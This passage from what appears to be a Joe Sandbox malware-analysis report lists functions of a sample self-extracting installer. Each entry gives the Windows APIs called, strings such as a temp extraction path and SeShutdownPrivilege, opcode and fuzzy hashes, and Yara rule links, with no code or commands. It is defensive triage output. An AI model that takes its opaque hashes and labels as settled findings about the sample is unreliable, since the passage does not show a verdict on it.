                                                                                            • Part of subcall function 00007FF681C27958: GetLastError.KERNEL32 ref: 00007FF681C2795C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                          • String ID: $<None>$UPROMPT
                                                                                          • API String ID: 957408736-2569542085
                                                                                          • Opcode ID: bce953315df2136bd9c83a7e38e7c9bcfbdf6b05f60fc9f9bc5cb1955f243e78
                                                                                          • Instruction ID: d35b92d19be5f3300e61f321c0459e4962931b5318b8365f9324c227bf526d01
                                                                                          • Opcode Fuzzy Hash: bce953315df2136bd9c83a7e38e7c9bcfbdf6b05f60fc9f9bc5cb1955f243e78
                                                                                          • Instruction Fuzzy Hash: 12316DB1A08352C7F7609B20E55467A7A70FF9D786F60613DDA4E82690DFBDD004CB00
                                                                                          Function 00007FF681C255C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile$lstrcmp
                                                                                          • String ID: *MEMCAB
                                                                                          • API String ID: 1301100335-3211172518
                                                                                          • Opcode ID: a2c1f66350d6024a7f804a88bc9b7da19f54bdbcb5e3280bfb267e90ce3ff26c
                                                                                          • Instruction ID: 0e2e8f4b8e51f0a7c8927356e76420b8b8e903718e5b5ee6dece17279f3a09e5
                                                                                          • Opcode Fuzzy Hash: a2c1f66350d6024a7f804a88bc9b7da19f54bdbcb5e3280bfb267e90ce3ff26c
                                                                                          • Instruction Fuzzy Hash: 4661A362A58781C7F7608B14E4843BA7AA1FF5DBA4F646339CA6E427D0CF7CA405C600
                                                                                          Function 00007FF681C25AF1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileTime$AttributesDateItemLocalText
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                          • API String ID: 851750970-4151094324
                                                                                          • Opcode ID: caf4f2272670990647462f14bfaf3187ac79d74cb37a0834bbd78866cb2a2d6f
                                                                                          • Instruction ID: 409435ffa0dec570b828188150cc341c74e2e2daa487a3ee025a3e3297b094be
                                                                                          • Opcode Fuzzy Hash: caf4f2272670990647462f14bfaf3187ac79d74cb37a0834bbd78866cb2a2d6f
                                                                                          • Instruction Fuzzy Hash: A6515932A18A46D3EB609B21D4001FA67B0FF8CB65F64623ADA5F936D4DE3CE545CB40
                                                                                          Function 00007FF681C26D9C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocLocal
                                                                                          • String ID: TMP4351$.TMP
                                                                                          • API String ID: 3494564517-2619824408
                                                                                          • Opcode ID: c669d64d882b60482da13300ba4968c1aecf883c3203920dff0371cbf708ca20
                                                                                          • Instruction ID: cbe72b7eaecd32667b9621f106e3450ee698faab61c7eedaa008f0edf183329e
                                                                                          • Opcode Fuzzy Hash: c669d64d882b60482da13300ba4968c1aecf883c3203920dff0371cbf708ca20
                                                                                          • Instruction Fuzzy Hash: 70418C62A08791C7FB508B24E4143B97AA0BF99BA5F686238DA6E837D5CF7CD445C700
                                                                                          Function 00007FF681C223C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager
                                                                                          • API String ID: 3677997916-3057196482
                                                                                          • Opcode ID: 72a84aa0c0c68ebabc0f94760f7052dc41f3436717cb00a692564cbfb68d1e7c
                                                                                          • Instruction ID: 0589e37b95ff00bd6b2f9e630fe8387ff7b6fa616a2ea42b6d06a59893a09063
                                                                                          • Opcode Fuzzy Hash: 72a84aa0c0c68ebabc0f94760f7052dc41f3436717cb00a692564cbfb68d1e7c
                                                                                          • Instruction Fuzzy Hash: B2114C36A08B52C7E7109B55E45057AA6B0FF8D750FA0623DDBED82B58DF2DD444CA00
                                                                                          Function 00007FF681C258D0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF681C23C80: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF681C23B49), ref: 00007FF681C23CA4
                                                                                            • Part of subcall function 00007FF681C23C80: PeekMessageA.USER32 ref: 00007FF681C23CC9
                                                                                            • Part of subcall function 00007FF681C23C80: PeekMessageA.USER32 ref: 00007FF681C23D0D
                                                                                          • WriteFile.KERNELBASE ref: 00007FF681C25924
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                          • String ID:
                                                                                          • API String ID: 1084409-0
                                                                                          • Opcode ID: df09df05b6a8f76d98ff4e568d39aff5741097c23a6c3239c69c04500cd56e3d
                                                                                          • Instruction ID: 909960f55e84e8fe4e63b51cf11a190e53b356c7e46e01ee77ba730b887b4fb1
                                                                                          • Opcode Fuzzy Hash: df09df05b6a8f76d98ff4e568d39aff5741097c23a6c3239c69c04500cd56e3d
                                                                                          • Instruction Fuzzy Hash: 22214F61B08582C7E7108F16E8443766771BF9E7A4F24A239D95E866A4CFBCD405CB44
                                                                                          Function 00007FF681C253B8 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                          • String ID:
                                                                                          • API String ID: 2018477427-0
                                                                                          • Opcode ID: 4017b6c058a6be902cddc169abc6d9dcaedc57a8715b21c16ee5d7d8bc7a3f89
                                                                                          • Instruction ID: 7317268b8727a5efe077ba06f14b1b453fa88e05b62b1ec3d1259383448f5e3f
                                                                                          • Opcode Fuzzy Hash: 4017b6c058a6be902cddc169abc6d9dcaedc57a8715b21c16ee5d7d8bc7a3f89
                                                                                          • Instruction Fuzzy Hash: 01115731A0C642C3FB508B14E4443B6A6B0FF4E759F34A238C94E866A5CFBDE885C201
                                                                                          Function 00007FF681C27E08 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharPrev
                                                                                          • String ID:
                                                                                          • API String ID: 122130370-0
                                                                                          • Opcode ID: f69c92ee4560cd4f0bb57aa589b20250cdd633262219f505effccc195a14fdcf
                                                                                          • Instruction ID: c446ba884318ea052a061bff805a11e8589b1086211a1754fdf51fddce7bc99d
                                                                                          • Opcode Fuzzy Hash: f69c92ee4560cd4f0bb57aa589b20250cdd633262219f505effccc195a14fdcf
                                                                                          • Instruction Fuzzy Hash: EA01C451A0C7C1CBF7104B15E48022DBAA1BB59BA0F686238DB69867D6CF2CDC42C700
                                                                                          Function 00007FF681C259B0 Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: c7d790a02c12fb3e5c56208d3f056b28bd5316e6bc6357f0cdb18446cbb40734
                                                                                          • Instruction ID: f0ef2bd5277e21b5cb93921db215a3eab74ef188f454957b73bc0f129dfd7b02
                                                                                          • Opcode Fuzzy Hash: c7d790a02c12fb3e5c56208d3f056b28bd5316e6bc6357f0cdb18446cbb40734
                                                                                          • Instruction Fuzzy Hash: B6F0F9326186C2D3EB184F25F5821B976B0FB4DB98F245239DA2B86694CE7CD481C710

                                                                                          Non-executed Functions

                                                                                          Function 00007FF681C2366E Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 177windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                          • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$gam
                                                                                          • API String ID: 3530494346-2071722121
                                                                                          • Opcode ID: e9cf0d75e323af3365a6df2e5f3018c508b1f812908897c7a83c784c3a62c979
                                                                                          • Instruction ID: 542812c723df2015dcee840e0c4d50d312b82b489ed41970f3284c8036d71eb7
                                                                                          • Opcode Fuzzy Hash: e9cf0d75e323af3365a6df2e5f3018c508b1f812908897c7a83c784c3a62c979
                                                                                          • Instruction Fuzzy Hash: 47716261E0C682CBF7609B21E5043796AB1BF9DB91F74B139CA4E86695CFBCE485C700
                                                                                          Function 00007FF681C25F7E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25220
                                                                                            • Part of subcall function 00007FF681C251F8: SizeofResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25231
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25257
                                                                                            • Part of subcall function 00007FF681C251F8: LoadResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25268
                                                                                            • Part of subcall function 00007FF681C251F8: LockResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25277
                                                                                            • Part of subcall function 00007FF681C251F8: memcpy_s.MSVCRT ref: 00007FF681C25296
                                                                                            • Part of subcall function 00007FF681C251F8: FreeResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C252A5
                                                                                          • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C23432), ref: 00007FF681C25FB0
                                                                                          • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C23432), ref: 00007FF681C25FC1
                                                                                          • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C23432), ref: 00007FF681C25FD0
                                                                                          • GetDlgItem.USER32 ref: 00007FF681C25FFD
                                                                                          • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF681C23432), ref: 00007FF681C2600E
                                                                                          • GetDlgItem.USER32 ref: 00007FF681C26026
                                                                                          • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF681C23432), ref: 00007FF681C2603A
                                                                                          • FreeResource.KERNEL32 ref: 00007FF681C26151
                                                                                          • SendMessageA.USER32 ref: 00007FF681C261B3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                          • String ID: CABINET
                                                                                          • API String ID: 1305606123-1940454314
                                                                                          • Opcode ID: 4cdd7ba035a56cc670f5a63f2d2ca6f6db77a2e8fb1204e6d46781fc6b5b295a
                                                                                          • Instruction ID: 6b8ede4c814f1b8f741f81f8aeaa4480b42879ac9a99379c8303e686e444bf84
                                                                                          • Opcode Fuzzy Hash: 4cdd7ba035a56cc670f5a63f2d2ca6f6db77a2e8fb1204e6d46781fc6b5b295a
                                                                                          • Instruction Fuzzy Hash: A0415971A08692C7FB509B60E8547796AB0FF8DB56F74A13CC90E82791DFBDE044C600
                                                                                          Function 00007FF681C21130 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 69librarymemoryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                                          • API String ID: 4204503880-1888249752
                                                                                          • Opcode ID: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                                                                                          • Instruction ID: 34741363dfc581039714deecbec07583872b0d9fad487e18307424b88ce66306
                                                                                          • Opcode Fuzzy Hash: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                                                                                          • Instruction Fuzzy Hash: 6031B276608B45CBE7508F56E4441AABBB0FB8EB90F656129EE4E83714DF3CE545CB00
                                                                                          Function 00007FF681C21BF4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 2829607268-3733053543
                                                                                          • Opcode ID: 651b18166e163d38126b57bec11a40fe2d1053f86929e6fedc5c23f0bf928afa
                                                                                          • Instruction ID: 74c9c541b405f846cc3097b4fb62ad91a6ef8a37b7a7d1c430dd68785cdd7a03
                                                                                          • Opcode Fuzzy Hash: 651b18166e163d38126b57bec11a40fe2d1053f86929e6fedc5c23f0bf928afa
                                                                                          • Instruction Fuzzy Hash: 76216D72A18A42C7E7608B61E4457BABAB0FF8DB45F60A139DA4E83A54DF3CD045CB00
                                                                                          Function 00007FF681C28BF4 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 4104442557-0
                                                                                          • Opcode ID: dcb9afa00af80bbd2438476da7bde3a9357a0fac88edcf4c174e2726fe409359
                                                                                          • Instruction ID: fb2af4226b583aaf542ed7417175290eddbef81c70165f8d8b5b705327307181
                                                                                          • Opcode Fuzzy Hash: dcb9afa00af80bbd2438476da7bde3a9357a0fac88edcf4c174e2726fe409359
                                                                                          • Instruction Fuzzy Hash: 4911F722A05B41CBEB409F71E8442A833B4FB4D758F502A38EA6D87754EF7CE5A4C240
                                                                                          Function 00007FF681C28A1E Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 31ba59d9759834a282d63e6df2edccb489d5ae17e54cd4dbc75f9f5da0e92170
                                                                                          • Instruction ID: 707607326a32f74b7ad96be3bc8ceda5323e8897effd65741f81ea686e012965
                                                                                          • Opcode Fuzzy Hash: 31ba59d9759834a282d63e6df2edccb489d5ae17e54cd4dbc75f9f5da0e92170
                                                                                          • Instruction Fuzzy Hash: D0B09B4661759242D60557B54D4914516502F4A5247982558C618C1950D95CA159C604
                                                                                          Function 00007FF681C23A4E Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120threadwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                          • String ID: $gam
                                                                                          • API String ID: 2654313074-718174934
                                                                                          • Opcode ID: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
                                                                                          • Instruction ID: 3b00f3dd74c07688abe0cd39e3edcb5864f883beacc81ac5534a16ed78db2d58
                                                                                          • Opcode Fuzzy Hash: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
                                                                                          • Instruction Fuzzy Hash: 59515F71E08A42C7E7508B15E9442796AB1FF8DB95F64B239C91E83B94CF7CA085C704
                                                                                          Function 00007FF681C27320 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 438COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                          • String ID: "$:$RegServer
                                                                                          • API String ID: 1203814774-766454958
                                                                                          • Opcode ID: ff462ce63a305f3a2fc0ff44f4bbd5613ae8e25fd08773fadb5e4e06ed0c4393
